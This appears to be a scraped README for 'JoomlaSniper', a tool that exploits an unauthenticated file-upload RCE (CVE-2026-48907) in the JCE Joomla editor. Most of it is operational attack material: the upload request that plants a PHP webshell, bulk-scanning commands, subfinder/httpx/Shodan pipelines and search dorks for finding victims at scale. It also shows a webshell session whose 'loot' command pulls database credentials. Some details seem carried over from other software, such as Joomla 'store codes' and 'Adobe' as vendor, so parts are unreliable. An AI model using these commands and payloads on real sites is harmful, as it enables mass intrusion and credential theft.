Share
## https://sploitus.com/exploit?id=899D9532-0589-53D4-8FFC-45107C8FD074
JoomlaSniper
CVE-2026-48907 β Joomla JCE Editor Unauthenticated RCE Framework
Overview β’
Attack Chain β’
Features β’
Installation β’
Usage β’
Shell β’
Versions
---
## π― Overview
**JoomlaSniper** is a comprehensive exploitation framework for **CVE-2026-48907**, an unauthenticated Remote Code Execution vulnerability in the **JCE (Joomla Content Editor)** extension for Joomla CMS.
The vulnerability allows attackers to upload arbitrary PHP files via the unauthenticated `profiles.import` endpoint, without any authentication. Depending on server configuration, this results in full remote code execution.
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-48907 β Technical Summary β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Vendor : Joomla Content Editor (joomlacontenteditor.net) β
β Type : Unauthenticated File Upload β RCE β
β CVSS Score : 10.0 (Critical) β
β CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H β
β CWE : CWE-434 (Unrestricted File Upload) β
β Affected : JCE 1.0.0 β 2.9.99.4 (ALL versions) β
β Patched : JCE 2.9.99.5 β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
> β οΈ **Authorized testing only.** This tool is intended for bug bounty hunting and penetration testing on systems you own or have explicit written permission to test.
---
## π Attack Chain
JoomlaSniper implements two independent attack vectors:
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ATTACK CHAIN β
β β
β ββββββββββββ βββββββββββββββ ββββββββββββββββββββββββ β
β β Detect βββββΆβ CSRF Token βββββΆβ Vector 1: tmp/ β β
β β JCE β β Extract β β βββββββββββββββββββ β β
β β Plugin β β (/) β β POST profiles.import β β
β ββββββββββββ βββββββββββββββ β β *.xml.php saved β β
β β β /tmp/{file}.php β β
β JCE Fingerprints: β β PHP executes β β
β /plugins/editors/jce/jce.xml ββββββββββββββββββββββββ β
β /administrator/components/com_jce/ β
β ββββββββββββββββββββββββ β
β Version detection: β Vector 2: images/ β β
β 2.9.82 β βββββββββββββββββββ β β
β β Import permissive β β
β β profile β enables β β
β β PHP uploads via β β
β β JCE browser RPC β β
β β β /images/{f}.php β β
β ββββββββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
### Vector 1 β Profile Import β `/tmp/` (Primary)
The core vulnerability: Joomla's `profiles.import` endpoint accepts file uploads without authentication. The uploaded file is saved to the Joomla `tmp/` directory **without any filename or content validation**.
```http
POST /index.php?option=com_jce HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=...
--boundary
Content-Disposition: form-data; name="task"
profiles.import
--boundary
Content-Disposition: form-data; name="{CSRF_TOKEN}"
1
--boundary
Content-Disposition: form-data; name="profile_file"; filename="shell.xml.php"
Content-Type: application/xml
--boundary--
```
**Result:** `https://target.com/tmp/shell.xml.php` β RCE
### Vector 2 β JCE Browser Plugin β `/images/` (Fallback)
If Vector 1 fails, JoomlaSniper imports a permissive JCE profile (enables PHP uploads), then uploads directly via the JCE browser RPC endpoint. Files land in `/images/` or can be renamed from `.gif` to `.php`.
---
## β¨ Features
| Feature | Description |
|---------|-------------|
| **Dual Vector** | V1 (tmp/) β V2 (images/) automatic fallback |
| **Interactive Shell** | Full PTY-like shell with built-in commands |
| **Zero Dependencies** | Pure Python stdlib β no pip required |
| **Pipeline Support** | `subfinder \| httpx \| JoomlaSniper` |
| **Multi-Store** | Auto-detects Joomla store code (en, de, fr, etc.) |
| **FP-Free Verify** | RXST/base64 decode check β no false positives |
| **Version Detect** | Reads JCE version, skips patched (β₯2.9.99.5) |
| **Multi-Function Shell** | `shell_exec β exec β system β passthru β popen` fallback |
| **Threaded Bulk Scan** | Configurable thread count for mass scanning |
| **JSON Report** | Machine-readable output with `-o results.json` |
---
## π¦ Installation
```bash
# Clone the repository
git clone https://github.com/ynsmroztas/JoomlaSniper
cd JoomlaSniper
# No dependencies needed β pure stdlib
python3 JoomlaSniper.py --help
```
**Requirements:** Python 3.10+
---
## π Usage
### Single Target
```bash
# Detection only β checks JCE version and file upload
python3 JoomlaSniper.py -u https://joomla.target.com
# Detection + interactive shell on confirmed RCE
python3 JoomlaSniper.py -u https://joomla.target.com --shell
```
### Bulk Scan
```bash
# Scan a list of targets
python3 JoomlaSniper.py -l targets.txt -t 15
# With JSON output
python3 JoomlaSniper.py -l targets.txt -t 20 -o results.json --silent
```
### Pipeline (subfinder + httpx + JoomlaSniper)
```bash
# Full recon pipeline β find Joomla sites with JCE
subfinder -d target.com -silent | \
httpx -silent -match-string "com_jce" | \
python3 JoomlaSniper.py -t 10 -o results.json
# Shodan export β httpx filter β JoomlaSniper
cat shodan_results.txt | \
httpx -silent -path /plugins/editors/jce/jce.xml -status-code -match-code 200 | \
awk '{print $1}' | \
python3 JoomlaSniper.py -t 20 --silent -o rce_results.json
```
### Custom Store Code
```bash
# Multi-language Joomla (auto-detect tries: default, en, de, fr, es, nl...)
python3 JoomlaSniper.py -u https://target.com --store nl
# Test Docker lab environment
python3 JoomlaSniper.py -u http://localhost:9999 --shell
```
### All Options
```
usage: JoomlaSniper.py [-h] [-u URL] [-l LIST] [-t THREADS]
[--timeout TIMEOUT] [--shell] [--store STORE]
[-o OUTPUT] [--silent] [--no-color]
options:
-u, --url Single target URL
-l, --list File with URLs (one per line)
-t, --threads Threads for bulk scan (default: 10)
--timeout Request timeout in seconds (default: 12)
--shell Launch interactive shell on confirmed RCE
--store Joomla store code (default: auto-detect)
-o, --output JSON report output file
--silent Suppress per-target output
--no-color Disable ANSI color output
```
---
## π» Interactive Shell
When RCE is confirmed, `--shell` launches a full interactive session:
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
JOOMLASNIPR β INTERACTIVE SHELL
Target : https://target.com
Shell : https://target.com/tmp/jce4x2k9a.xml.php
Vector : V1:tmp
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
jce@target.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
jce@target.com$ sysinfo
OS: Linux server 5.4.0-208-generic #228-Ubuntu
User: uid=33(www-data)
CWD: /var/www/html
PHP: PHP 8.1.27
jce@target.com$ loot
/var/www/html/configuration.php
$user = 'joomla_db_user';
$password = 'S3cur3P@ssw0rd!';
$db = 'joomla_production';
$host = 'localhost';
jce@target.com$ funcs
shell_exec: OK
exec: OK
system: OK
passthru: OK
jce@target.com$ exit
Shell session ended.
```
### Built-in Commands
| Command | Description |
|---------|-------------|
| `sysinfo` | OS, PHP version, current user, working directory |
| `loot` | Find Joomla `configuration.php` β extracts DB credentials |
| `funcs` | List available PHP execution functions |
| `phpinfo` | Show `disable_functions` and PHP config |
| `debug` | Show raw HTTP response (diagnose shell issues) |
| `exit` | Close shell session |
| `` | Execute arbitrary system commands |
### Shell Function Fallback Chain
When `shell_exec` is disabled (common on shared hosting), JoomlaSniper automatically tries alternatives:
```
shell_exec β exec β system β passthru β popen β proc_open
```
---
## π Affected Versions
| Version | Status |
|---------|--------|
| JCE 1.0.0 β 2.9.99.4 | β Vulnerable (ALL production versions) |
| JCE 2.9.99.5 | β
Patched |
> **Note:** The vulnerable code has existed since the very first JCE release. Adobe fixed it only in 2.9.99.5 and there is **no backport** to older production branches.
### Impact by Server Configuration
| Scenario | Impact |
|----------|--------|
| PHP execution allowed in `tmp/` | β
Full RCE β code executes |
| PHP execution blocked in `tmp/` | β οΈ File Write β persistent PHP file on disk |
| PHP execution blocked everywhere | βΉοΈ Detection only β no immediate RCE |
> Even when PHP execution is blocked, the uploaded file **persists on disk**. A future configuration change, server migration, or web server update could expose it to execution.
---
## π Shodan Queries
```
# JCE-specific fingerprints
http.html:"editors/jce"
http.html:"com_jce"
http.html:"/media/editors/jce/js"
# Combined with Joomla
http.html:"Joomla" http.html:"editors/jce"
```
**FOFA:**
```
body="editors/jce" && body="Joomla"
```
**Google:**
```
inurl:"option=com_jce"
inurl:"/plugins/editors/jce/"
```
---
## π Output Example
```json
[
{
"target": "https://target.com",
"jce_found": true,
"jce_ver": "2.9.82",
"patched": false,
"vector": "V1:tmp",
"rce": true,
"shell_url": "https://target.com/tmp/jce4x2k9a.xml.php",
"upload_path": "/tmp/jce4x2k9a.xml.php"
}
]
```
---
## π§ͺ Test Lab (Docker)
The second PoC repo includes a Docker Compose lab:
```bash
# Clone test environment
git clone https://github.com/ywh-jfellus/CVE-2026-48907
cd CVE-2026-48907
# Start vulnerable instance (JCE 2.9.99.4)
docker compose -f vulnerable/docker-compose.yaml up -d
# Run JoomlaSniper against lab
python3 JoomlaSniper.py -u http://localhost:9999 --shell
# Start patched instance (JCE 2.9.99.5) to verify detection
docker compose -f patched/docker-compose.yaml up -d
python3 JoomlaSniper.py -u http://localhost:9999
# Expected: [PATCHED] JCE 2.9.99.5 >= 2.9.99.5
```
---
## π§ Exit Codes
| Code | Meaning |
|------|---------|
| `0` | No vulnerable targets found |
| `1` | File upload confirmed (no PHP execution) |
| `2` | RCE confirmed β PHP execution verified |
Useful for automation:
```bash
python3 JoomlaSniper.py -u https://target.com --silent
if [ $? -eq 2 ]; then
echo "RCE confirmed β sending report"
fi
```
---
## π References
- [NVD β CVE-2026-48907](https://nvd.nist.gov/vuln/detail/CVE-2026-48907)
- [GitHub Advisory GHSA-c3f5-4g7f-qjqj](https://github.com/advisories/GHSA-c3f5-4g7f-qjqj)
- [Original PoC by ywh-jfellus](https://github.com/ywh-jfellus/CVE-2026-48907)
- [BIBIL_0DAY Mass Scanner](https://github.com/webshellseo8/CVE-2026-48907-Unauthenticated-RCE-in-JCE)
- [JCE Official Changelog](https://www.joomlacontenteditor.net/support/documentation/changelog)
---
## βοΈ Disclaimer
This tool is provided for **educational purposes and authorized security testing only**.
- Only use against systems you own or have explicit written authorization to test
- The author is not responsible for any misuse or damage caused by this tool
- Bug bounty hunters: ensure the target is in scope before testing
- Responsible disclosure: report findings to vendors before public disclosure
---
## π€ Author
**Mitsec** ([@ynsmroztas](https://x.com/ynsmroztas))
Top Hacker @ Intigriti | Bug Bounty Hunter
[](https://www.intigriti.com)
[](https://hackerone.com)
[](https://x.com/ynsmroztas)
---
Built with β€οΈ for the security community